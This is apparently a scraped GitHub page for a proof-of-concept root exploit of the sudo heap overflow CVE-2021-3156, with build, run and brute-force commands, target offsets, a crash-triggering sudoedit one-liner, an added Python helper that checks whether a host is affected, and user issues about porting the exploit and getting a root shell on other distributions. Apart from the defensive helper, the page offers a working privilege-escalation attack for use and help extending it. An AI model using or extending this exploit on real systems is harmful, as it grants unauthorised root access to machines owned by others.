CVE-2021-3156 PoC

Introduction

This is an exploit for the CVE-2021-3156 sudo vulnerability (dubbed Baron Samedit by Qualys).

Usage

build:

$ make

list targets:

$ ./sudo-hax-me-a-sandwich

run:

$ ./sudo-hax-me-a-sandwich <target_number>

manual mode:

$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>

Bruteforce target finding (experimental)

Make sure you have GNU parallel installed.

$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>

some defaults to try:

$ ./brute.sh 90 120 50 70 150 300

Will eat up all available cores. Don't try to netflix & brute.
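Before pointing a PoC like this at a lab host, the first question is whether the installed sudo is in scope at all, and several of the issues on this page are really that question. The Python helper below is an added example, not code from this repository or from blasty: it checks the upstream version string against the affected ranges published in the Qualys advisory (legacy 1.8.2 to 1.8.31p2, stable 1.9.0 to 1.9.5p1, fixed upstream in 1.9.5p2) and classifies the output of the advisory's harmless "sudoedit -s /" probe, which an unpatched sudo answers with "sudoedit: /: not a regular file" and a patched one with its usage text. The sample strings are constructed from outputs quoted on this page; collect_local() assumes a POSIX host with sudo and sudoedit on PATH.

```python
"""Triage helper for CVE-2021-3156 (Baron Samedit): is this host's sudo in scope?

Added example, not part of the CVE-2021-3156 PoC repository. Two signals are
combined, neither of which runs any exploit code:

  1. the upstream sudo version against the affected ranges from the Qualys
     advisory (legacy 1.8.2 .. 1.8.31p2, stable 1.9.0 .. 1.9.5p1; fixed
     upstream in 1.9.5p2), and
  2. the non-destructive `sudoedit -s /` probe from the same advisory: an
     unpatched sudoedit prints "sudoedit: /: not a regular file", a patched
     one prints its usage text ("usage: ...").

Distributions backport the fix without changing the upstream number (Debian 10
shipped it as 1.8.27-1+deb10u3, still reporting 1.8.27), so signal 1 alone
over-reports; the probe (or the package changelog) settles it.
"""
import re
import subprocess

# Inclusive (low, high) bounds as (major, minor, patch, p-level) tuples.
AFFECTED_RANGES = (
    ((1, 8, 2, 0), (1, 8, 31, 2)),   # legacy branch
    ((1, 9, 0, 0), (1, 9, 5, 1)),    # stable branch, fixed in 1.9.5p2
)

# Matches "1.8.31", "1.8.31p2", "1.9.5p1"; the "pN" suffix is optional.
VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)(?:p(\d+))?\b")


def parse_sudo_version(text):
    """Return the first sudo version found in `text` as a comparable 4-tuple.

    `text` may be the whole multi-line output of `sudo --version`; the first
    line ("Sudo version X.Y.ZpN") is the one that matters and the first match.
    """
    m = VERSION_RE.search(text)
    if m is None:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def version_in_affected_range(version_text):
    """True if the upstream version number lies inside an advisory-affected range."""
    v = parse_sudo_version(version_text)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def classify_probe_output(probe_output):
    """Interpret what `sudoedit -s /` printed (it writes to stderr)."""
    lines = [ln for ln in probe_output.splitlines() if ln.strip()]
    first = lines[0].strip() if lines else ""
    if first.startswith("sudoedit:") and "not a regular file" in first:
        return "vulnerable"
    if first.startswith("usage:"):
        return "patched"
    return "unknown"


def triage(version_output, probe_output):
    """Combine both signals into a single verdict string."""
    in_range = version_in_affected_range(version_output)
    probe = classify_probe_output(probe_output)
    if probe == "vulnerable":
        return "vulnerable"
    if probe == "patched":
        # Version number inside the range but probe says fixed: a backport.
        return "patched (backported fix)" if in_range else "patched"
    if in_range:
        return "possibly vulnerable: version in range, probe inconclusive"
    return "not in affected range"


def collect_local():
    """Run both commands on this host (assumes sudo/sudoedit on PATH).

    Neither command modifies anything; `sudoedit -s /` only errors out.
    """
    ver = subprocess.run(["sudo", "--version"], capture_output=True, text=True)
    probe = subprocess.run(["sudoedit", "-s", "/"], capture_output=True, text=True)
    return ver.stdout, probe.stderr + probe.stdout


if __name__ == "__main__":
    # Constructed sample built from outputs quoted in the issues on this page.
    sample_version = "Sudo version 1.8.31\nSudoers policy plugin version 1.8.31\n"
    sample_probe = "sudoedit: /: not a regular file\n"
    print("sample host:", triage(sample_version, sample_probe))
    try:
        print("this host:", triage(*collect_local()))
    except FileNotFoundError:
        print("this host: sudo/sudoedit not on PATH")
```

The version check is deliberately not the final word: Debian 10 with 1.8.27-1+deb10u3 still reports "Sudo version 1.8.27", which is inside the affected range, and only the probe (or a grep of the package changelog for CVE-2021-3156) shows that it is fixed. That is why triage() reports "patched (backported fix)" for that combination rather than trusting the number alone.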

Contributing

Send (sensible) PR's, I might merge.

Some ideas:

  • More targets
  • Target finding
  • Other exploitation strategies
  • More self contained functionality:
    • Embed shared library hax.c (Make it small please, ELF golf + asm setuid/execve stub)
    • Add mkdir logic to hax.c
  • Directory/shared library cleanup

Contributors

blasty, thez3ro

Issues

more targets

Do you mind sharing your approach to finding the target? Or let me know how you set the env with all the multiple backslashes before calling sudoedit? I understand the exploit, but I don't know how to set the env for multiple \ (I mean from C yes, but for manual gdb invocation not really). Thank you.

Move from tcache to fastbins abuse

Regarding the heap grooming, is there any chance to move from tcache to fastbins abuse?

Unfortunately too many OSes are equipped with glibc < 2.26... so we won't be able to leverage this exploit on them.

Thanks in advance and congrats for this amazing exploit!

Centos 6.10 version is not adapted

Hi
Could you give the method for the CentOS 6.10 target? The latest sudo version is 1.8.6p3-29.el6 on CentOS 6.
Hoping for your reply! Thank you very much!

Ubuntu 16.04 GLIBC 2.23

Hello blasty
I'm trying to make the PoC work on Ubuntu 16.04 but...
First of all, the nss_load_library technique doesn't work -> it turns out sudoedit never tried to load any systemd.so libraries,
so this made the code unusable and I'm now trying to make it work via the process_getenv method.
All of the techniques used to exploit the heap overflow relied on the fact that tcache was enabled, and this made early heap allocation very easy to achieve; I think this is because the tcache bin range is too wide (0x20-0x408).
Before glibc 2.31, tcache wasn't implemented yet.... so the heap allocation became a problem (correct me if I'm wrong), as I couldn't allocate any chunk before the sudo_hook_entry* struct.

Do you have any idea on how to make an early allocation with fastbins? I tried to make the LC env values small enough to fit into fastbins... but every time I break at the set_cmnd code that reads the args, I never saw any free [fast]bin before the target struct...

Also I wanted to say that, using pwndbg, there are no free chunks containing my LC values at all;
on the contrary, on Ubuntu 20.04 using your exploit I saw free chunks containing the LC environment values.

PS: I used the fuzzer edited by you in the lockedbyte repo, but I know it relies on RIP to search for exploits, and there were no free heap chunks before the struct address in the first place... and the sanity checks of free/malloc are in the way too.
If we manage to make the PoC work with Ubuntu glibc versions < 2.31, I think all distros with old versions will be easy to exploit too.
I just want the approach and I will gladly put time into trying it (or them).

Thanks for your time.

Ubuntu 12.04

Is there any schedule to release a version for older versions of Ubuntu???

PoC not working on a vulnerable Debian 10

I'm trying to make the PoC work on a Debian 10 machine. The sudo version is the vulnerable one, as you can see in the screenshot below. But when running the PoC, it doesn't work and asks me for my password to use sudo, just as if it was not vulnerable. Any idea how this could happen? I don't understand why the PoC doesn't work while the test with a bunch of A's and the backslash works fine.
[screenshot not preserved]

Suggestion on your new CVE-2021-3156 OS format

Hey,

First of all thx for your hard work! :D

I wonder if you could add an option ./sudo-hax-me-a-sandwich -b to bruteforce specific ranges from:

    .smash_len_a    = 56,
    .smash_len_b    = 54,
    .null_stomp_len = 63, 
    .lc_all_len     = 212

This way it becomes easier to find different offsets for different os/lib versions.
After that you could ask the user to send the details to this github page with os and lib information to give it more stability.

Not working on my focal

Hello,

Tested on my fresh install of focal.

user@ubuntu20:~/TEST/CVE-2021-3156$ ldd --version
ldd (Ubuntu GLIBC 2.31-0ubuntu9) 2.31
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

user@ubuntu20:/TEST/CVE-2021-3156$ uname -a
Linux ubuntu20 5.8.0-41-generic #46
20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

user@ubuntu20:/TEST/CVE-2021-3156$ ls
hax.c lib.c libnss_X Makefile README.md sudo-hax-me-a-sandwich
user@ubuntu20:/TEST/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty [email protected]

using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
** pray for your rootshell.. **
free(): invalid pointer
Aborted (core dumped)

user@ubuntu20:~/TEST/CVE-2021-3156$ cat /etc/issue
Ubuntu 20.04.1 LTS \n \l

user@ubuntu20:~/TEST/CVE-2021-3156$ /usr/bin/sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

I've tested your fuzz2.py but I'm not able to crash in process_hooks_getenv() or in nss_load_library()...
Only found Interesting crash in set_cmnd()...

Debian9 stretch

Hi, testing in my LAB with a debian9 stretch, the bruteforce doesn't seem to be working correctly.

Sudo version 1.8.19p1
Sudoers policy plugin version 1.8.19p1
Sudoers file grammar version 45
Sudoers I/O plugin version 1.8.19p1
libc version 2.24-11+deb9u4

Tried with "brute.sh 90 120 50 70 150 300" and also other ranges, without success.
Is anybody able to make this work for debian9?

Thanks a lot.

Exploit fails on Debian cloud image

Hi,

Thanks for this really convenient exploit. I was able to get it working on my Debian 10 and Ubuntu 20.04 machines.

However, I noticed it failed on one of my Debian Cloud (OpenStack) virtual machines. The VM in question is running the linux-image-4.19.0-13-cloud-amd64 kernel, which is used by many cloud providers.

When I execute sudo-hax-me-a-sandwich 1 on this system, it prompts for a password, even though the user account has no sudo access and was created using --disabled-password (it has no password associated with it):

usernopass@debian10-2:~/CVE-2021-3156$ uname -a
Linux debian10-2 4.19.0-13-cloud-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
usernopass@debian10-2:~/CVE-2021-3156$ apt policy sudo
sudo:
  Installed: 1.8.27-1+deb10u2
  Candidate: 1.8.27-1+deb10u3
  Version table:
     1.8.27-1+deb10u3 500
        500 http://security.debian.org/debian-security buster/updates/main amd64 Packages
 *** 1.8.27-1+deb10u2 500
        500 http://deb.debian.org/debian buster/main amd64 Packages
        100 /var/lib/dpkg/status
usernopass@debian10-2:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 1

** CVE-2021-3156 PoC by blasty <[email protected]>

using target: 'Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28'
** pray for your rootshell.. **

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for usernopass:
Sorry, try again.
[sudo] password for usernopass:
sudoedit: 1 incorrect password attempt

Running the exploit from a user that does have a password also causes the prompt. When I enter the password, the message "userwithpass is not in the sudoers file. This incident will be reported." is returned. And I made sure the installed version of sudo is vulnerable; sudoedit -s '\' $(perl -e 'print "A" x 65536') causes a crash.

RHEL

RHEL support pls

cat /proc/version
Linux version 2.6.32-696.el6.x86_64 ([email protected]) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-18) (GCC) ) #1 SMP Tue Feb 21 00:53:17 EST 2017

you can get ISO here
https://archive.org/details/rhel-server-6.9-x86_64-dvd

must compile with flag -std=c99

errors:
..snipp..

7f2a8cfe9000-7f2a8d030000 r-xp 00000000 08:03 1053874                    /usr/lib64/libssl3.so
7f2a8d030000-7f2a8d230000 ---p 00047000 08:03 1053874                    /usr/lib64/libssl3.so
7f2a8d230000-7f2a8d234000 r--p 00047000 08:03 1053874                    /usr/lib64/libssl3.so
7f2a8d234000-7f2a8d235000 rw-p 0004b000 08:03 1053874                    /usr/lib64/libssl3.so
7f2a8d235000-7f2a8d236000 rw-p 00000000 00:00 0 
7f2a8d236000-7f2a8d24f000 r-xp 00000000 08:03 1050994                    /usr/lib64/libsasl2.so.2.0.23
7f2a8d24f000-7f2a8d44e000 ---p 00019000 08:03 1050994                    /usr/lib64/libsasl2.so.2.0.23
7f2a8d44e000-7f2a8d44f000 r--p 00018000 08:03 1050994                    /usr/lib64/libsasl2.so.2.0.23
7f2a8d44f000-7f2a8d450000 rw-p 00019000 08:03 1050994                    /usr/lib64/libsasl2.so.2.0.23
7f2a8d450000-7f2a8d466000 r-xp 00000000 08:03 655402                     /lib64/libresolv-2.12.so
7f2a8d466000-7f2a8d666000 ---p 00016000 08:03 655402                     /lib64/libresolv-2.12.so
7f2a8d666000-7f2a8d667000 r--p 00016000 08:03 655402                     /lib64/libresolv-2.12.so
7f2a8d667000-7f2a8d668000 rw-p 00017000 08:03 655402                     /lib64/libresolv-2.12.so
7f2a8d668000-7f2a8d66a000 rw-p 00000000 00:00 0 
7f2a8d66a000-7f2a8d678000 r-xp 00000000 08:03 655585                     /lib64/liblber-2.4.so.2.10.3
7f2a8d678000-7f2a8d877000 ---p 0000e000 08:03 655585                     /lib64/liblber-2.4.so.2.10.3
7f2a8d877000-7f2a8d878000 r--p 0000d000 08:03 655585                     /lib64/liblber-2.4.so.2.10.3
7f2a8d878000-7f2a8d879000 rw-p 0000e000 08:03 655585                     /lib64/liblber-2.4.so.2.10.3
Aborted

thx

Centos is safe even if sudo is vulnerable

I tried the exploit on several different old CentOS versions. Sudo is vulnerable. The exploit fails.

CentOS release 6.10 Linux version 2.6.32-696
Sudo version 1.8.6p3
Sudoers policy plugin version 1.8.6p3
Sudoers file grammar version 42
Sudoers I/O plugin version 1.8.6p3
ldd (GNU libc) 2.12

sudoedit -s /
sudoedit: /: not a regular file

Brute script without GNU Parallel

I'm attempting to get this exploit working on MacOS Catalina, but I'm running into the issue of not having GNU Parallel. I was wondering what changes I could make to the brute.sh script, or if there's known values for MacOS Catalina already
